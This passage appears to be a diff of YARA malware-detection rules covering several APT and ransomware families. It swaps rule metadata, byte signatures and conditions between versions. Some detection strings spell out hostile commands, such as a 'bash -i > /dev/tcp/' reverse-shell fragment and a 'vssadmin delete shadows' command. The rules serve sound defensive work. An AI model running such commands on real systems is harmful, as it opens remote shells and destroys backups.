"N/A" - logic_hash = "ec7867e40e4418bb662c8cf5a71566cd261d2040ee5d3afa0bbe2b92ebfef98e" - score = 50 - quality = 53 + logic_hash = "66d9fad7105b46a55db11c5224b1a395793f2dee89f779d59c80b2f7cda5a115" + score = 75 + quality = 75 tags = "FILE" - hash1 = "5d0af3bf0dc7d99fc87d844a0fcd99796b9257ba02d78510422c498d445f0d0d" + hash1 = "97982e098a4538d05e78c172c9bbc5b412754df86dc73e760004f0038ec928fb" + hash2 = "46338cae732ee1664aac77d9dce57c4ff8666460c1a51bee49cae44c86e42df9" + hash3 = "f0d23aa026ae6ba96051401dc2b390ba5c968d55c2a4b31a36e45fb67dfc2e3c" + tlp = "white" + adversary = "Gelsemium" strings: - $s1 = "-nolan" fullword wide - $s2 = { 34 33 33 41 35 43 35 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 34 36 36 39 36 43 36 35 37 33 32 30 32 38 37 38 33 38 33 36 32 39 35 43 34 44 36 39 36 33 37 32 36 46 37 33 36 46 36 36 37 34 32 30 35 33 35 31 34 43 32 30 35 33 36 35 37 32 37 36 36 35 37 32 } - $s3 = { 34 33 33 41 35 43 35 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 34 36 36 39 36 43 36 35 37 33 35 43 34 44 36 39 36 33 37 32 36 46 37 33 36 46 36 36 37 34 32 30 35 33 35 31 34 43 32 30 35 33 36 35 37 32 37 36 36 35 37 32 } - $s4 = { 32 32 37 33 37 35 36 32 36 39 36 34 32 32 33 41 32 32 00 00 32 32 36 43 36 31 36 45 36 37 32 32 33 41 32 32 } - $s5 = { 32 32 36 43 36 31 36 45 36 37 32 32 33 41 32 32 } - $s6 = { 32 32 36 35 37 38 37 34 32 32 33 41 32 32 } - $s7 = { 32 32 36 42 36 35 37 39 32 32 33 41 32 32 } - $s8 = { 32 32 36 45 36 35 37 34 37 37 36 46 37 32 36 42 32 32 33 41 32 32 } - $s9 = { 36 32 36 33 36 34 36 35 36 34 36 39 37 34 32 45 36 35 37 38 36 35 32 30 32 46 37 33 36 35 37 34 32 30 37 42 36 34 36 35 36 36 36 31 37 35 36 43 37 34 37 44 32 30 36 32 36 46 36 46 37 34 37 33 37 34 36 31 37 34 37 35 37 33 37 30 36 46 36 43 36 39 36 33 37 39 32 30 36 39 36 37 36 45 36 46 37 32 36 35 36 31 36 43 36 43 36 36 36 31 36 39 36 43 37 35 37 32 36 35 37 33 } - $s10 = { 36 32 36 33 36 34 36 35 36 34 36 39 37 34 32 45 36 35 37 38 36 35 32 30 32 46 37 33 36 35 37 34 32 30 37 42 36 34 36 35 36 36 36 31 37 35 36 43 37 34 37 44 32 30 37 32 36 35 36 33 36 46 37 36 36 35 37 32 37 39 36 35 36 45 36 31 36 32 36 43 36 35 36 34 32 30 34 45 36 46 } - $s11 = { 37 37 36 44 36 39 36 33 32 45 36 35 37 38 36 35 32 30 35 33 34 38 34 31 34 34 34 46 35 37 34 33 34 46 35 30 35 39 32 30 32 46 36 45 36 46 36 39 36 45 37 34 36 35 37 32 36 31 36 33 37 34 36 39 37 36 36 35 } - $s12 = { 35 33 34 46 34 36 35 34 35 37 34 31 35 32 34 35 35 43 34 44 36 39 36 33 37 32 36 46 37 33 36 46 36 36 37 34 35 43 34 35 35 32 34 39 34 34 } - $s13 = { 37 32 36 35 36 31 36 34 36 44 36 35 32 45 37 34 37 38 37 34 } + $s1 = { b8 [3] 74 e8 [2] 00 00 81 ec bc 03 00 00 53 56 57 be [3] 74 8d bd 38 fc ff ff 6a 1b a5 a5 a5 a5 66 a5 59 33 c0 8d bd 4a fc ff ff be [3] 74 f3 ab 66 ab 8d bd b8 fc ff ff 6a 1c a5 a5 a5 a5 59 33 c0 8d bd c8 fc ff ff 6a 07 f3 ab 59 be [3] 74 8d bd 38 fd ff ff 6a 18 f3 a5 66 a5 8b 5d 0c 59 8d bd 56 fd ff ff 83 65 cc 00 f3 ab 66 ab 8a 03 6a 00 8d 4d e0 c7 45 c0 24 00 00 00 c7 45 c4 25 00 00 00 c7 45 c8 23 00 00 00 88 45 e0 ff 15 [3] 74 a1 [3] 74 8d 4d e0 ff 30 6a 00 53 ff 15 [3] 74 8a 45 0f 6a 00 8d 4d d0 c7 45 fc 01 00 00 00 88 45 d0 ff 15 [3] 74 8b 35 [3] 74 bf [3] 74 57 ff d6 59 50 57 8d 4d d0 ff 15 [3] 74 8b 55 d4 8b 0d [3] 74 85 d2 c6 45 fc 02 75 02 8b d1 8b 43 04 85 c0 75 02 8b c1 ff 75 d8 52 50 ff 15 [3] 74 83 c4 0c 85 c0 0f 85 d9 00 00 00 8d 85 b8 fd ff ff 50 68 04 01 00 00 ff 15 [3] 74 8d 85 b8 fd ff ff 50 ff d6 85 c0 59 0f 84 b5 00 00 00 8d 85 b8 fd ff ff 50 ff d6 66 83 bc 45 b6 fd ff ff 2f 59 74 56 8d 85 b8 fd ff ff 50 ff d6 66 83 bc 45 b6 fd ff ff 5c 59 74 41 8d 4d e0 ff 15 [3] 74 8b 7d e4 8b 5d d8 8d 4d e0 ff 15 [3] 74 8b 45 e4 89 45 f0 8d 85 b8 fd ff ff 50 ff d6 59 8d 84 45 b8 fd ff ff 50 8d 85 b8 fd ff ff 50 8d 44 5f fe 50 ff } + $s2 = { ff 75 0c 89 45 f0 ff d6 50 ff 75 0c ff 75 f0 ff 15 [3] 74 83 c4 10 85 c0 } + $s3 = "pluginkey" fullword wide + $s4 = { 55 8b ec 51 33 c0 56 f6 05 [3] 74 01 89 45 fc 0f 85 c6 00 00 00 8a 4d 0b 80 0d [3] 74 01 53 bb [3] 74 57 88 0d [3] 74 50 8b cb ff 15 [3] 74 8b 35 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 8a 45 0b bb [3] 74 6a 00 8b cb a2 [3] 74 ff 15 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 8a 45 0b bb [3] 74 6a 00 8b cb a2 [3] 74 ff 15 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 8a 45 0b bb [3] 74 6a 00 8b cb a2 [3] 74 ff 15 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 68 [2] e2 74 e8 [2] 00 00 59 5f 33 c0 5b 8b 75 08 8a 4d 0b 68 [3] 74 68 [3] 74 88 0e 50 8b ce 89 46 04 89 46 08 89 46 0c e8 [2] 00 00 8b c6 5e } condition: - uint16(0)==0x5a4d and filesize >100KB and 10 of ($s*) + uint16(0)==0x5a4d and filesize >15KB and 3 of ($s*) } -rule ARKBIRD_SOLG_APT_Sidewinder_Nov_2020_1 : FILE +rule ARKBIRD_SOLG_APT_Gelsemium_Gelsemine_June_2021_1 : FILE { meta: - description = "Detect Sidewinder DLL decoder algorithm" + description = "Detect Gelsemine malware (Dropper - Variant 1)" author = "Arkbird_SOLG" - id = "9e948949-f38d-5a76-a34c-965ec9be070d" - date = "2020-11-14" - modified = "2020-11-15" - reference = "https://twitter.com/hexfati/status/1325397305051148292" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-15/APT_SideWinder_Nov_2020_1.yar#L1-L12" + id = "cfe932fd-ff50-5e54-824c-e11afe8e8575" + date = "2021-06-12" + modified = "2021-06-14" + reference = "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-13/Gelsemium/APT_Gelsemium_Gelsemine_June_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "661eb5510ff0aa59b38b2c023653f0a23867a2813d854fbd0a7a6b657d9ba671" + logic_hash = "2b5031412de163ad92dfe00c7da331eb36c4ce7b590df48dfa84df0104e93b15" score = 75 quality = 75 tags = "FILE" - hash1 = "8d7ad2c603211a67bb7abf2a9fe65aefc993987dc804bf19bafbefaaca066eaa" + hash1 = "00b701e3ef29912c1fcd8c2154c4ae372cfe542cfa54ffcce9fb449883097cec" + hash2 = "109d4b8878b8c8f3b7015f6b3ae573a6799296becce0f32ca3bd216bee0ab473" + hash3 = "fe71b66d65d5ff9d03a47197c99081d9ec8d5f6e95143bdc33f5ea2ac0ae5762" + hash3 = "29e78ca3cb49dd2985a29e74cafb1a0a15515670da0f4881f6095fb2926bfefd" + tlp = "white" + adversary = "Gelsemium" strings: - $s = { 13 30 05 00 ?? 00 00 00 01 00 00 11 ?? ?? 00 00 ?? ?? ?? 00 00 [30-80] 2B 16 07 08 8F 1? } + $s1 = { 8b 44 24 04 83 ec 40 85 c0 53 55 56 57 0f 84 ec 15 00 00 8b 58 1c 85 db 0f 84 e1 15 00 00 8b 48 0c 85 c9 0f 84 d6 15 00 00 83 38 00 75 0b 8b 48 04 85 c9 0f 85 c6 15 00 00 83 3b 0b 75 06 c7 03 0c 00 00 00 8b 48 0c 8b 30 8b 78 04 8b 53 38 8b 6b 3c 89 4c 24 28 8b 48 10 8b 03 83 f8 1e 89 4c 24 20 89 74 24 14 89 7c 24 18 89 54 24 10 89 7c 24 38 89 4c 24 2c c7 44 24 34 00 00 00 } + $s2 = { 33 c0 33 d2 8a 06 8a 56 01 03 c8 33 c0 8a 46 02 03 f9 03 ca 33 d2 8a 56 03 03 f9 03 c8 33 c0 8a 46 04 03 f9 03 ca 33 d2 8a 56 05 03 f9 03 c8 33 c0 8a 46 06 03 f9 03 ca 33 d2 8a 56 07 03 f9 03 c8 33 c0 8a 46 08 03 f9 03 ca 33 d2 8a 56 09 03 f9 03 c8 33 c0 8a 46 0a 03 f9 03 ca 33 d2 8a 56 0b 03 f9 03 c8 33 c0 8a 46 0c 03 f9 03 ca 33 d2 8a 56 0d 03 f9 03 c8 33 c0 8a 46 0e 03 f9 03 ca 33 d2 8a 56 0f 03 f9 03 c8 83 c6 10 03 f9 03 ca 03 f9 4d 0f 85 67 ff ff ff 8b c1 33 d2 b9 f1 ff 00 00 f7 f1 8b c7 bf f1 ff 00 00 8b ca 33 d2 f7 f7 ff 4c 24 18 8b fa 0f 85 38 ff ff ff 85 db 0f 84 da 00 00 00 83 fb 10 0f 82 a1 00 00 00 8b eb c1 ed 04 33 d2 33 c0 8a 16 8a 46 01 03 ca 33 d2 8a 56 02 03 f9 03 c8 33 c0 8a 46 03 03 f9 03 ca 33 d2 8a 56 04 03 f9 03 c8 33 c0 8a 46 05 03 f9 03 ca 33 d2 8a 56 06 03 f9 03 c8 33 c0 8a 46 07 03 f9 03 ca 33 d2 8a 56 08 03 f9 03 c8 33 c0 8a 46 09 03 f9 03 ca 33 d2 8a 56 0a 03 f9 03 c8 33 c0 8a 46 0b 03 f9 03 ca 33 d2 8a 56 0c 03 f9 03 c8 33 c0 8a 46 0d 03 f9 03 ca 33 d2 8a 56 0e 03 f9 03 c8 33 c0 8a 46 0f 03 f9 03 ca 83 eb 10 03 f9 03 c8 03 f9 83 c6 10 } + $s3 = { 55 8b ec 6a ff 68 [2] 40 00 68 [2] 40 00 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 83 ec 68 53 56 57 89 65 e8 33 db 89 5d fc 6a 02 5f 57 ff 15 [2] 40 00 59 83 0d [2] 41 00 ff 83 0d [2] 41 00 ff ff 15 [2] 40 00 8b 0d [2] 41 00 89 08 ff 15 [2] 40 00 8b 0d [2] 41 00 89 08 a1 [2] 40 00 8b 00 a3 [2] 41 00 e8 ?? 01 00 00 39 1d [3] 00 75 0c 68 [2] 40 00 ff 15 [2] 40 00 59 e8 ?? 01 00 00 68 [3] 00 68 [3] 00 e8 ?? 01 00 00 a1 [2] 41 00 89 45 94 8d 45 94 50 ff 35 [2] 41 00 8d 45 9c 50 8d 45 90 50 8d 45 a0 50 ff 15 [2] 40 00 68 [3] 00 68 00 [2] 00 e8 ?? 01 00 00 83 c4 24 a1 [2] 40 00 8b 30 3b } condition: - uint16(0)==0x5a4d and filesize >3KB and $s + uint16(0)==0x5a4d and filesize >150KB and all of ($s*) } -rule ARKBIRD_SOLG_Exp_CVE_2021_40444_Sep_2021_1 : FILE +import "pe" + +rule ARKBIRD_SOLG_APT_MAL_NK_Lazarus_Dacls_June_2020_1 : FILE { meta: - description = "Detect the maldocs with a structure like used for CVE_2021_40444 exploit" + description = "Detect DACLS malware used by APT Lazarus" author = "Arkbird_SOLG" - id = "acaba73d-f744-5d3f-9617-e976832f3577" - date = "2021-09-09" - modified = "2021-09-09" - reference = "https://github.com/StrangerealIntel/DailyIOC" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-09/Exp_CVE_2021_40444_Sep_2021_1.yara#L2-L20" + id = "fb85b83a-4367-5f1d-be06-8a8e906b8df7" + date = "2020-06-11" + modified = "2020-06-12" + reference = "https://twitter.com/batrix20/status/1270924079826997248" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-12/Lazarus/Lazarus_June_2020_1.yar#L3-L26" license_url = "N/A" - logic_hash = "ba1b256c9caad3371d57e6ecbe54721038c819c7c081edf2443523109c25b184" - score = 50 - quality = 75 + logic_hash = "ed3e4a7a0490c5e8854d4e1bc8a223658ab9657a03c1b237af1056293a51611b" + score = 75 + quality = 48 tags = "FILE" - reference1 = "-" - hash1 = "199b9e9a7533431731fbb08ff19d437de1de6533f3ebbffc1e13eeffaa4fd455" - hash2 = "3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf" - hash3 = "5b85dbe49b8bc1e65e01414a0508329dc41dc13c92c08a4f14c71e3044b06185" - hash4 = "938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52" - tlp = "White" - level = "experimental" - adversary = "-" + hash1 = "2dd57d67e486d6855df8235c15c9657f39e488ff5275d0ce0fcec7fc8566c64b" strings: - $x1 = { 2f 5f 72 65 6c 73 2f 64 6f 63 75 6d 65 6e 74 2e 78 6d 6c 2e 72 65 6c 73 55 54 09 00 03 [3] 61 [3] 61 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 ?? 94 ?? 4e c2 [3] ef 4d 7c 87 } - $x2 = { 77 6d 66 55 54 09 00 03 00 a6 ce 12 00 a6 ce 12 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 bb 7e f6 d8 2c 06 38 48 00 93 85 e1 8c 0c 9c 0c 0c cc 52 60 1e 2b 98 64 01 62 66 46 0e 30 8f 9b 09 26 ce 03 66 31 83 55 00 00 50 4b 03 04 ?? 00 00 00 ?? 00 [10] 00 00 [2] 00 00 ?? 00 1c 00 } + $s1 = "bash -i > /dev/tcp/" fullword ascii + $s2 = "__mh_execute_header" fullword ascii + $s3 = "/bin/bash -c \"" fullword ascii + $s4 = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" fullword ascii + $s5 = "@_gethostbyname" fullword ascii + $s6 = "@_gethostname" fullword ascii + $s7 = "radr://5614542" fullword ascii + $s8 = "sh -c \"" fullword ascii + $s9 = "content-type: multipart/form-data" fullword ascii + $s10 = "@___stack_chk_fail" fullword ascii + $s11 = "/usr/lib/libSystem.B.dylib" fullword ascii + $s12 = "@dyld_stub_binder" fullword ascii condition: - uint16(0)==0x4B50 and filesize >5KB and all of ($x*) + uint16(0)==0xfacf and filesize <200KB and 10 of them } -rule ARKBIRD_SOLG_Loader_Buer_Nov_2020_1 : FILE +import "pe" + +rule ARKBIRD_SOLG_APT_MAL_NK_Lazarus_Nukesped_June_2020_1 : FILE { meta: - description = "Detect Buer loader" + description = "Detect NukeSped malware used by APT Lazarus" author = "Arkbird_SOLG" - id = "a2883eca-d576-53ba-aa97-5e3c94f501a5" - date = "2020-12-01" - modified = "2020-12-01" - reference = "https://twitter.com/James_inthe_box/status/1333551419735953409" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-01/Buer/Mal_Buer_Nov_2020_1.yar#L35-L64" + id = "7a5b27df-43bd-544d-8d0f-72e58ce3064c" + date = "2020-06-11" + modified = "2020-06-12" + reference = "https://twitter.com/batrix20/status/1270924079826997248" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-12/Lazarus/Lazarus_June_2020_1.yar#L28-L54" license_url = "N/A" - logic_hash = "96a74b497076be170ce6138189501d8b3a1002bcf07f9d3cf662d64612d04a59" + logic_hash = "b1332eb255f8ae9ae6a68ef8ef86d9f5472584cae8161c27186e341990df7eae" score = 75 - quality = 55 + quality = 75 tags = "FILE" - hash1 = "2824d4b0e5a502416696b189bd840870a19dfd555b53535f20b0c87c95f4c232" - hash2 = "a98abbce5e84c4c3b67b7af3f9b4dc9704b5af33b6183fb3c192e26b1e0ca005" - hash3 = "ae3ac27e8303519cf04a053a424a0939ecc3905a9a62f33bae3a29f069251b1f" + hash1 = "90ea1c7806e2d638f4a942b36a533a1da61adedd05a6d80ea1e09527cf2d839b" strings: - $s1 = "bcdfghklmnpqrstvwxz" fullword ascii - $s2 = "%02x" fullword wide - $s3 = "{%s-%d-%d}" fullword wide - $s4 = "update" fullword wide - $s5 = "]otju}y&Ykx|kx&867?5Ykx|kx&867<" fullword ascii - $s6 = "]otju}y&Ykx|kx&8678&X8" fullword ascii - $s7 = "]otju}y&\\oyzg5Ykx|kx&857>" fullword ascii - $s8 = "]otju}y&>47" fullword ascii - $s9 = "]otju}y&Ykx|kx&8678" fullword ascii - $s10 = "]otju}y&=" fullword ascii - $s11 = "Iutzktz3Z" fullword ascii - $s12 = "g|mnuuq~4jrr" fullword ascii - $s13 = "RegularModules" fullword ascii - $s14 = "]otju}y&>" fullword ascii + $s1 = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X" fullword wide + $s2 = "<htr<jtb<lt6<tt&<wt" fullword ascii + $s3 = "Content-Disposition: form-data; name=\"file\"; filename=\"%s\"" fullword ascii + $s4 = "Content-Type: multipart/form-data; boundary=" fullword wide + $s5 = "POST" fullword ascii + $s6 = "Content-Type: octet-stream" fullword ascii + $s7 = "CONOUT$" fullword ascii + $s8 = "cmd.exe /c" fullword ascii + $s9 = "2>&1" fullword ascii + $s10 = "WINHTTP.dll" fullword ascii + $s11 = "WinHttpSendRequest" fullword wide + $s12 = "ObtainUserAgentString" fullword ascii + $s13 = "WS2_32.dll" fullword ascii + $s14 = "WinHttpReceiveResponse" fullword ascii + $s15 = "GetLogicalDrives" fullword ascii condition: - uint16(0)==0x5a4d and filesize >10KB and 8 of them + uint16(0)==0x5a4d and filesize <100KB and (pe.imphash()=="c8379f0eeeb3a522f1dd75aa5f1500b0" or 12 of them ) } -rule ARKBIRD_SOLG_Ran_Babuklockers_Jan_2021_1 : FILE +rule ARKBIRD_SOLG_Mal_Plugx_Thor_July_2021_1 : FILE { meta: - description = "Detect the BabukLocker ransomware" + description = "Detect Thor variant of PlugX (Variant 1)" author = "Arkbird_SOLG" - id = "a3bad41d-59fb-564f-a352-ca38af582c08" - date = "2020-01-03" - modified = "2021-01-03" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-01-02/BabukLocker/Ran_BabukLockers_Jan_2021_1.yar#L1-L23" + id = "5447e5df-0326-5987-905b-bfc49acee05a" + date = "2021-07-27" + modified = "2021-07-28" + reference = "https://unit42.paloaltonetworks.com/thor-plugx-variant/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-27/PlugX/Mal_PlugX_Thor_July_2021_1.yara#L1-L20" license_url = "N/A" - logic_hash = "8939e408948dd7b17acdac5c6b5f50db24ec63f19937b8663a15f52b678d0065" - score = 50 + logic_hash = "f94e6cf8a1169526a438dfbf4d6b40f4ce0f6af6eee2e893fb138b81c4172c73" + score = 75 quality = 75 tags = "FILE" - hash1 = "8203c2f00ecd3ae960cb3247a7d7bfb35e55c38939607c85dbdb5c92f0495fa9" - level = "Experimental" + hash1 = "125fdf108dc1ad6f572cbdde74b0c7fa938a9adce0cc80cb5ce00f1c030b0c93" + hash2 = "690c488a9902978f2ef05aa23d21f4fa30a52dd9d11191f9b49667cd08618d87" + hash3 = "3c5e2a4afe58634f45c48f4e800dc56bae3907dde308ff97740e9cd5684d1c53" + hash4 = "a9cbce007a7467ba1394eed32b9c1774ad09a9a9fb74eb2ccc584749273fac01" + tlp = "white" + adversary = "Chinese APT group" strings: - $seq1 = { 55 8b ec 83 ec 14 a1 b0 81 40 00 33 c5 89 45 fc c7 45 f8 ff ff ff ff c7 45 f4 00 40 00 00 8d 45 f0 50 8b 4d 08 51 6a 13 6a 00 6a 02 e8 85 2b 00 00 85 c0 0f 85 a3 00 00 00 8b 55 f4 52 e8 ae 06 00 00 83 c4 04 89 45 08 83 7d 08 00 0f 84 81 00 00 00 8d 45 f4 50 8b 4d 08 51 8d 55 f8 52 8b 45 f0 50 e8 55 2b 00 00 85 c0 75 5c c7 45 ec 00 00 00 00 eb 09 8b 4d ec 83 c1 01 89 4d ec 8b 55 ec 3b 55 f8 73 40 8b 45 ec c1 e0 05 8b 4d 08 8b 54 01 0c 83 e2 02 74 14 8b 45 ec c1 e0 05 03 45 } - $seq2 = { 68 68 22 40 00 b8 04 00 00 00 c1 e0 00 8b 8d 9c fd ff ff 8b 14 01 52 ff 15 b8 90 40 00 85 c0 75 0c c7 85 b0 fd ff ff 01 00 00 00 eb 58 68 74 22 40 00 b8 04 00 00 00 c1 e0 00 8b 8d 9c fd ff ff 8b 14 01 52 ff 15 b8 90 40 00 85 c0 75 0c c7 85 b0 fd ff ff 00 00 00 00 eb 2b 68 80 22 40 00 b8 04 00 00 00 c1 e0 00 8b 8d 9c fd ff ff 8b 14 01 52 ff 15 b8 90 40 00 85 c0 75 0a c7 85 b0 fd ff ff ff ff ff ff e9 55 ff ff ff 6a 00 6a 00 ff 15 a8 90 40 00 e8 aa 04 00 00 e8 05 } - $seq3 = { 83 c4 0c 68 f4 00 00 00 8d 85 f4 fd ff ff 50 68 88 22 40 00 ff 15 6c 90 40 00 68 98 22 40 00 8d 8d f4 fd ff ff 51 ff 15 c4 90 40 00 c7 85 ec fd ff ff 00 00 00 00 6a 00 68 80 00 00 00 6a 01 6a 00 6a 01 68 00 00 00 40 8d 95 f4 fd ff ff 52 ff 15 70 90 40 00 89 85 98 fd ff ff 83 bd 98 fd ff ff ff 0f 84 2e 03 00 00 6a 00 8d 85 ec fd ff ff 50 68 90 00 00 00 68 78 82 40 00 8b 8d 98 fd ff ff 51 ff 15 90 90 } - $s1 = "\\ecdh_pub_k.bin" fullword wide - $s2 = "ntuser.dat.log" fullword wide - $s3 = "cmd.exe" fullword ascii - $s4 = "/c vssadmin.exe delete shadows /all /quiet" fullword wide - $s5 = { 5c 00 5c 00 3f 00 5c 00 00 00 00 00 3a 00 00 00 98 2f } + $s1 = { 55 8b ec 81 ec ?? 01 00 00 a1 00 [2] 10 33 c5 89 45 [2-10] 85 ?? fe ff ff [0-1] c6 85 ?? fe ff ff 5c c6 85 ?? fe ff ff ?? c6 85 ?? fe ff ff ?? c6 85 ?? fe ff ff ?? c6 85 ?? fe ff ff } + $s2 = { 8b ?? ?? fe ff ff c6 ?? 00 [3-5] fe ff ff [4-10] fe ff ff } + $s3 = { fe ff ff 6a 40 68 00 10 00 00 8b 95 ?? fe ff ff 52 6a 00 ff 95 ?? fe ff ff 89 85 ?? fe ff ff } condition: - uint16(0)==0x5a4d and filesize >15KB and 2 of ($seq*) and 3 of ($s*) + uint16(0)==0x5A4D and filesize >25KB and all of ($s*) } -rule ARKBIRD_SOLG_MAL_OSX_Wizardupdate_Oct_2021_2 : FILE +rule ARKBIRD_SOLG_RAN_Yanluowang_Dec_2021_1 : FILE { meta: - description = "Detect a structure like the bash of WizardUpdate installer on OSX system" + description = "Detect Yanluowang ransomware" author = "Arkbird_SOLG" - id = "3e48c2fa-10f4-5152-90e6-f5f8cc507103" - date = "2021-10-22" - modified = "2021-10-23" - reference = "https://twitter.com/MsftSecIntel/status/1451279679059488773" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-23/WizardUpdate/MAL_OSX_WizardUpdate_Oct_2021_2.yara#L1-L20" + id = "339d3dab-9bdd-5a46-8261-c32862ccc3bf" + date = "2021-12-17" + modified = "2021-12-18" + reference = "https://samples.vx-underground.org/samples/Families/YanluowangRansomware/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-18/RAN_Yanluowang_Dec_2021_1.yara#L1-L20" license_url = "N/A" - logic_hash = "99d3323e3c155be040fef3beea0a55aec9bd3178df822d5fd6530864186446ed" + logic_hash = "0144874fb24411b4378a2e2992934e674808f01ecc38f23d0d9d37e1d45621e4" score = 75 - quality = 67 + quality = 75 tags = "FILE" - hash1 = "eafacc44666901a5ea3c81a128e5dd88d0968a400d74ef1da5c2c05dc6dd7a39" - tlp = "White" + hash1 = "49d828087ca77abc8d3ac2e4719719ca48578b265bbb632a1a7a36560ec47f2d" + hash2 = "d11793433065633b84567de403c1989640a07c9a399dd2753aaf118891ce791c" + tlp = "white" adversary = "-" strings: - $s1 = { 24 28 65 76 61 6c 20 65 63 68 6f 20 7e 24 28 65 63 68 6f 20 24 55 53 45 52 29 29 } - $s2 = { 69 66 20 5b 20 21 20 2d 66 20 22 24 [5-15] 22 20 5d 3b 20 74 68 65 6e } - $s3 = { 63 75 72 6c 20 2d 2d 72 65 74 72 79 20 [2-3] 2d 66 20 22 } - $s4 = { 78 61 74 74 72 20 2d 72 20 2d 64 20 63 6f 6d 2e 61 70 70 6c 65 2e 71 75 61 72 61 6e 74 69 6e 65 } - $s5 = { 6c 61 75 6e 63 68 63 74 6c 20 6c 6f 61 64 20 2d 77 } - $s6 = { 63 68 6f 77 6e 20 2d 52 20 24 55 53 45 52 } - $s7 = { 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 5c 22 31 2e 30 5c 22 20 65 6e 63 6f 64 69 6e 67 3d 5c 22 55 54 46 2d 38 5c 22 3f 3e 0a 09 3c 21 44 4f 43 54 59 50 45 20 70 6c 69 73 74 20 50 55 42 4c 49 43 20 5c 22 2d 2f 2f 41 70 70 6c 65 2f 2f 44 54 44 20 50 4c 49 53 54 20 31 2e 30 2f 2f 45 4e 5c 22 20 5c 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 70 70 6c 65 2e 63 6f 6d 2f 44 54 44 73 2f 50 72 6f 70 65 72 74 79 4c 69 73 74 2d 31 2e 30 2e 64 74 64 5c 22 3e 0a 09 3c 70 6c 69 73 74 20 76 65 72 73 69 6f 6e 3d 5c 22 31 2e 30 5c 22 3e } + $s1 = { 6a 00 68 7b 4d 45 00 e8 52 2a 00 00 6a 00 6a 00 68 44 58 45 00 68 78 58 45 00 68 d8 56 45 00 c6 45 fc 15 8b 3d d8 71 44 00 6a 00 ff d7 6a 00 6a 00 68 80 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 a0 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 b8 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 cc 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 e4 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 fc 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 10 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 2c 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 40 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 54 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 68 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 88 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 a0 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 b8 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 d0 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 ec 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 00 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 14 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 28 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 40 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 54 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 80 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 68 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 7c 5a 45 00 68 78 58 45 00 } + $s2 = { 83 bd d4 ee ff ff 10 8d 